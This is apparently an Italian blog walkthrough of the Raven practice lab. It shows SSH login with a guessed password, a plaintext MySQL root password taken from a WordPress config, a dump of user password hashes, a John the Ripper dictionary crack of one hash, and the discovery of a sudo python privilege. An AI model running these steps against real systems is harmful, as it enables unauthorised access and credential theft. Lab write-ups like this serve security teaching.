HackingLab – Raven

Proviamo a collegarci in ssh con Steve e con Michael usando username e password identici e riusciamo ad accedere con l’utenza di Michael.

kali@kali:~$ ssh michael@192.168.188.82
The authenticity of host '192.168.188.82 (192.168.188.82)' can't be established.
ECDSA key fingerprint is SHA256:rCGKSPq0sUfa5mqn/8/M0T63OxqkEIR39pi835oSDo8.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.188.82' (ECDSA) to the list of known hosts.
michael@192.168.188.82's password: 

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have new mail.
michael@Raven:~$ whoami
michael
michael@Raven:~$ id
uid=1000(michael) gid=1000(michael) groups=1000(michael),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)
michael@Raven:~$ 

Vediamo quali comandi possono essere eseguiti da Michael con privilegi di root, scoprendo che non può eseguire alcun comando.

michael@Raven:~$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for michael: 
Sorry, user michael may not run sudo on raven.

Alla ricerca delle flag proviamo con il comando find -name flag* 2>/dev/null trovando il file flag2 all’interno di var/www dove:
2>/dev/null indica che gli errori vanno mandati a /dev/null
flag2{fc3fd58dcdad9ab23faca6e9a36e581c}

michael@Raven:/$ find -name flag* 2>/dev/null
./var/www/flag2.txt
./usr/share/doc/apache2-doc/manual/tr/rewrite/flags.html
./usr/share/doc/apache2-doc/manual/ja/rewrite/flags.html
./usr/share/doc/apache2-doc/manual/ko/rewrite/flags.html
./usr/share/doc/apache2-doc/manual/zh-cn/rewrite/flags.html
./usr/share/doc/apache2-doc/manual/de/rewrite/flags.html
./usr/share/doc/apache2-doc/manual/es/rewrite/flags.html
./usr/share/doc/apache2-doc/manual/da/rewrite/flags.html
./usr/share/doc/apache2-doc/manual/pt-br/rewrite/flags.html
./usr/share/doc/apache2-doc/manual/fr/rewrite/flags.html
./usr/share/doc/apache2-doc/manual/en/rewrite/flags.html
./sys/devices/pci0000:00/0000:00:11.0/net/eth0/flags
./sys/devices/virtual/net/lo/flags
./sys/devices/platform/serial8250/tty/ttyS0/flags
./sys/devices/platform/serial8250/tty/ttyS1/flags
./sys/devices/platform/serial8250/tty/ttyS2/flags
./sys/devices/platform/serial8250/tty/ttyS3/flags
michael@Raven:/$ 

Andiamo ora a vedere i file di wordpress alla ricerca di configurazioni con dati sensibili in chiaro.

michael@Raven:/var/www/html/wordpress$ ls -al
total 204
drwxrwxrwx  5 root     root      4096 Jun  6 19:02 .
drwxrwxrwx 10 root     root      4096 Aug 13  2018 ..
-rw-r--r--  1 www-data www-data   255 Aug 13  2018 .htaccess
-rwxrwxrwx  1 root     root       418 Sep 25  2013 index.php
-rwxrwxrwx  1 root     root     19935 Aug 13  2018 license.txt
-rwxrwxrwx  1 root     root      7413 Jun  6 19:02 readme.html
-rwxrwxrwx  1 root     root      6864 Jun  6 19:02 wp-activate.php
drwxrwxrwx  9 root     root      4096 Jun 15  2017 wp-admin
-rwxrwxrwx  1 root     root       364 Dec 19  2015 wp-blog-header.php
-rwxrwxrwx  1 root     root      1627 Aug 29  2016 wp-comments-post.php
-rw-rw-rw-  1 www-data www-data  3134 Aug 13  2018 wp-config.php
-rwxrwxrwx  1 root     root      2853 Dec 16  2015 wp-config-sample.php
drwxrwxrwx  6 root     root      4096 Jun  6 19:02 wp-content
-rwxrwxrwx  1 root     root      3286 May 24  2015 wp-cron.php
drwxrwxrwx 18 root     root     12288 Jun 15  2017 wp-includes
-rwxrwxrwx  1 root     root      2422 Nov 21  2016 wp-links-opml.php
-rwxrwxrwx  1 root     root      3301 Oct 25  2016 wp-load.php
-rwxrwxrwx  1 root     root     34347 Jun  6 19:02 wp-login.php
-rwxrwxrwx  1 root     root      8048 Jan 11  2017 wp-mail.php
-rwxrwxrwx  1 root     root     16200 Apr  6  2017 wp-settings.php
-rwxrwxrwx  1 root     root     29924 Jan 24  2017 wp-signup.php
-rwxrwxrwx  1 root     root      4513 Oct 14  2016 wp-trackback.php
-rwxrwxrwx  1 root     root      3065 Aug 31  2016 xmlrpc.php

Troviamo, in chiaro, l’utenza e la password al database MySQL.

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'root');

/** MySQL database password */
define('DB_PASSWORD', 'R@v3nSecurity');

Dopo aver effettuato login come root a MySQL con il comando mysql -u root -p ed inserita la password “R@v3nSecurity” navighiamo all’interno del database elencandoli prima con il comando show databases; selezionando poi il DB “wordpress” con il comando use wordpress; elencando le tabelle con show tables; e selezionando quindi tutto il contenuto della tabella wp_users con la query select * from wp_users;.
In questo modo ho ottenuto gli hash di Michael, di cui già conosco la password, e quello di Steven:
|  1 | michael | $P$BjRvZQ.VQcGZlDeiKToCQd.cPw5XCe0 |
|  2 | steven | $P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/ |

michael@Raven:/var/www/html/wordpress$ mysql -u root -p
Enter password: 
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 92
Server version: 5.5.60-0+deb8u1 (Debian)

Copyright (c) 2000, 2018, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| wordpress          |
+--------------------+
4 rows in set (0.01 sec)

mysql> use wordpress;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
+-----------------------+
| Tables_in_wordpress   |
+-----------------------+
| wp_commentmeta        |
| wp_comments           |
| wp_links              |
| wp_options            |
| wp_postmeta           |
| wp_posts              |
| wp_term_relationships |
| wp_term_taxonomy      |
| wp_termmeta           |
| wp_terms              |
| wp_usermeta           |
| wp_users              |
+-----------------------+
12 rows in set (0.00 sec)

mysql> select * from wp_users;
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
| ID | user_login | user_pass                          | user_nicename | user_email        | user_url | user_registered     | user_activation_key | user_status | display_name   |
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
|  1 | michael    | $P$BjRvZQ.VQcGZlDeiKToCQd.cPw5XCe0 | michael       | michael@raven.org |          | 2018-08-12 22:49:12 |                     |           0 | michael        |
|  2 | steven     | $P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/ | steven        | steven@raven.org  |          | 2018-08-12 23:31:16 |                     |           0 | Steven Seagull |
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+

Ottenuti gli l’hash li salviamo in un file di testo ed utilizziamo John the ripper per un attacco brute force indicando un dizionario seguendo la sintassi: john -wordlist=<PATH AL DIZIONARIO> -pot=/usr/share/john/john.pot <FILE HASH>.
Scopriamo la password di steven (pink84).

kali@kali:~$ cd Documenti/
kali@kali:~/Documenti$ cd Raven1/
kali@kali:~/Documenti/Raven1$ ls
hash
kali@kali:~/Documenti/Raven1$ sudo john -wordlist=/home/kali/Documenti/Dizionari/rockyou.txt -pot=/usr/share/john/john.pot hash
[sudo] password di kali: 
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (phpass [phpass ($P$ or $H$) 256/256 AVX2 8x3])
Cost 1 (iteration count) is 8192 for all loaded hashes
Press 'q' or Ctrl-C to abort, almost any other key for status
pink84           (?)

Effettuiam login in .ssh con l’utenza di Steven e visualizziamo i comandi che può eseguire con privilegi di root scoprendo che può utilizzare Python come amministratore.

michael@Raven:/var/www$ su steven
Password: 
$ whoami
steven
$ id
uid=1001(steven) gid=1001(steven) groups=1001(steven)
$ sudo -l
Matching Defaults entries for steven on raven:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User steven may run the following commands on raven:
    (ALL) NOPASSWD: /usr/bin/python
$ 

Leave a Reply

Your email address will not be published. Required fields are marked *